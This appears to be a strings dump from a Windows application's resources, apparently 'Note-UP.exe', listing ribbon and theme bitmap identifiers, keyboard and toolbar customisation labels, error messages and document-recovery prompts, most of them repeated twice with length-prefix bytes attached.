_OFFICE2007_RIBBON_BTN_PALETTE_M*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T SILVER_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN,SILVER_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE'SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA-SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS*SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_BACK)SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB-SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB.SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB(SILVER_IDB_OFFICE2007_RIBBON_KEYTIP_BACK)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_B)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_T'SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN.SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER&SILVER_IDB_OFFICE2007_RIBBON_PANEL_QAT,SILVER_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR*SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_BACK.SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY,SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL0SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT-SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS,SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS)SILVER_IDB_OFFICE2007_RIBBON_SLIDER_THUMB$SILVER_IDB_OFFICE2007_STATUSBAR_BACK(SILVER_IDB_OFFICE2007_STATUSBAR_BACK_EXT*SILVER_IDB_OFFICE2007_STATUSBAR_PANEBORDER'SILVER_IDB_OFFICE2007_STATUSBAR_SIZEBOX"SILVER_IDB_OFFICE2007_SYS_BTN_BACK$SILVER_IDB_OFFICE2007_SYS_BTN_BACK_S#SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE%SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S%SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE'SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE_S
WINDOWS7_IDB_COMBOBOX_BTN
WINDOWS7_IDB_COMBOBOX_BTN
WINDOWS7_IDB_MENU_BTN
WINDOWS7_IDB_MENU_BTN
WINDOWS7_IDB_MENU_BTN_DISABLED
WINDOWS7_IDB_MENU_BTN_DISABLED
WINDOWS7_IDB_MENU_ITEM_BACK
WINDOWS7_IDB_MENU_ITEM_BACK
WINDOWS7_IDB_MENU_ITEM_MARKER_C
WINDOWS7_IDB_MENU_ITEM_MARKER_C
WINDOWS7_IDB_MENU_ITEM_MARKER_R
WINDOWS7_IDB_MENU_ITEM_MARKER_R
WINDOWS7_IDB_RIBBON_BORDER_QAT
WINDOWS7_IDB_RIBBON_BORDER_QAT
WINDOWS7_IDB_RIBBON_BTN_DEFAULT$WINDOWS7_IDB_RIBBON_BTN_DEFAULT_ICON%WINDOWS7_IDB_RIBBON_BTN_DEFAULT_IMAGE#WINDOWS7_IDB_RIBBON_BTN_DEFAULT_QAT%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_M
WINDOWS7_IDB_RIBBON_BTN_DEFAULT$WINDOWS7_IDB_RIBBON_BTN_DEFAULT_ICON%WINDOWS7_IDB_RIBBON_BTN_DEFAULT_IMAGE#WINDOWS7_IDB_RIBBON_BTN_DEFAULT_QAT%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_F
WINDOWS7_IDB_RIBBON_BTN_GROUP_F
WINDOWS7_IDB_RIBBON_BTN_GROUP_L
WINDOWS7_IDB_RIBBON_BTN_GROUP_L
WINDOWS7_IDB_RIBBON_BTN_GROUP_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_S
WINDOWS7_IDB_RIBBON_BTN_GROUP_S
WINDOWS7_IDB_RIBBON_BTN_LAUNCH#WINDOWS7_IDB_RIBBON_BTN_LAUNCH_ICON
WINDOWS7_IDB_RIBBON_BTN_LAUNCH#WINDOWS7_IDB_RIBBON_BTN_LAUNCH_ICON
WINDOWS7_IDB_RIBBON_BTN_MAIN WINDOWS7_IDB_RIBBON_BTN_MENU_H_C WINDOWS7_IDB_RIBBON_BTN_MENU_H_M WINDOWS7_IDB_RIBBON_BTN_MENU_V_C WINDOWS7_IDB_RIBBON_BTN_MENU_V_M WINDOWS7_IDB_RIBBON_BTN_NORMAL_B WINDOWS7_IDB_RIBBON_BTN_NORMAL_S
WINDOWS7_IDB_RIBBON_BTN_MAIN WINDOWS7_IDB_RIBBON_BTN_MENU_H_C WINDOWS7_IDB_RIBBON_BTN_MENU_H_M WINDOWS7_IDB_RIBBON_BTN_MENU_V_C WINDOWS7_IDB_RIBBON_BTN_MENU_V_M WINDOWS7_IDB_RIBBON_BTN_NORMAL_B WINDOWS7_IDB_RIBBON_BTN_NORMAL_S
WINDOWS7_IDB_RIBBON_BTN_PAGE_L
WINDOWS7_IDB_RIBBON_BTN_PAGE_L
WINDOWS7_IDB_RIBBON_BTN_PAGE_R!WINDOWS7_IDB_RIBBON_BTN_PALETTE_B!WINDOWS7_IDB_RIBBON_BTN_PALETTE_M!WINDOWS7_IDB_RIBBON_BTN_PALETTE_T#WINDOWS7_IDB_RIBBON_BTN_STATUS_PANE
WINDOWS7_IDB_RIBBON_BTN_PAGE_R!WINDOWS7_IDB_RIBBON_BTN_PALETTE_B!WINDOWS7_IDB_RIBBON_BTN_PALETTE_M!WINDOWS7_IDB_RIBBON_BTN_PALETTE_T#WINDOWS7_IDB_RIBBON_BTN_STATUS_PANE
WINDOWS7_IDB_RIBBON_CAPTION_QA!WINDOWS7_IDB_RIBBON_CATEGORY_BACK WINDOWS7_IDB_RIBBON_CATEGORY_TAB$WINDOWS7_IDB_RIBBON_CATEGORY_TAB_SEP"WINDOWS7_IDB_RIBBON_PANEL_BACK_SEP
WINDOWS7_IDB_RIBBON_CAPTION_QA!WINDOWS7_IDB_RIBBON_CATEGORY_BACK WINDOWS7_IDB_RIBBON_CATEGORY_TAB$WINDOWS7_IDB_RIBBON_CATEGORY_TAB_SEP"WINDOWS7_IDB_RIBBON_PANEL_BACK_SEP
WINDOWS7_IDB_RIBBON_PANEL_MAIN$WINDOWS7_IDB_RIBBON_SLIDER_BTN_MINUS#WINDOWS7_IDB_RIBBON_SLIDER_BTN_PLUS
WINDOWS7_IDB_RIBBON_PANEL_MAIN$WINDOWS7_IDB_RIBBON_SLIDER_BTN_MINUS#WINDOWS7_IDB_RIBBON_SLIDER_BTN_PLUS
WINDOWS7_IDX_STYLE
WINDOWS7_IDX_STYLE
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
Keyboard
Keyboard
C&urrent Keys:
C&urrent Keys:
Press &New Shortcut Key:
Press &New Shortcut Key:
Show shortcut &keys in ScreenTips
Show shortcut &keys in ScreenTips
Windows
Windows
Help Keyboard
Help Keyboard
Keyboard shortcuts:
Keyboard shortcuts:
Customize Keyboard
Customize Keyboard
Press &new shortcut key:
Press &new shortcut key:
Can't create a new image!,Can't paste bitmap image from the clipboard!2You can paste bitmap with the size (%d x %d) only!
Can't create a new image!,Can't paste bitmap image from the clipboard!2You can paste bitmap with the size (%d x %d) only!
Move Item DownrExecutable (*.exe)|*.exe|Command (*.com)|*.com|Information (*.pdf)|*.pdf|Batch (*.bat)|*.bat|All Files (*.*)|*.*||
Move Item DownrExecutable (*.exe)|*.exe|Command (*.com)|*.com|Information (*.pdf)|*.pdf|Batch (*.bat)|*.bat|All Files (*.*)|*.*||
You may define up to %d tools.
You may define up to %d tools.
Expand (%s)
Expand (%s)
Keys
Keys
Default Menu=Default application menu. Appears when no documents are open.[-------------------------------------------------------------------------------------------.Do you really want to delete the toolbar '%s'?
Default Menu=Default application menu. Appears when no documents are open.[-------------------------------------------------------------------------------------------.Do you really want to delete the toolbar '%s'?
All CommandsLAll your changes will be lost! Do you really want to reset the toolbar '%s'?RAll your changes will be lost! Do you really want to reset all toolbars and menus?IAll your changes will be lost! Do you really want to reset the menu '%s'?
All CommandsLAll your changes will be lost! Do you really want to reset the toolbar '%s'?RAll your changes will be lost! Do you really want to reset all toolbars and menus?IAll your changes will be lost! Do you really want to reset the menu '%s'?
DefaultTAll your changes will be lost! Do you really want to reset the keyboard assignments?
DefaultTAll your changes will be lost! Do you really want to reset the keyboard assignments?
4You can't create more than %d user-defined toolbars!
4You can't create more than %d user-defined toolbars!
Undo %d Actions
Undo %d Actions
Row %d of %d
Row %d of %d
Row %d-%d of %d
Row %d-%d of %d
All Files (*.*)
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
%s [Recovered]
1.0.0.1
1.0.0.1
Note-UP.exe
Note-UP.exe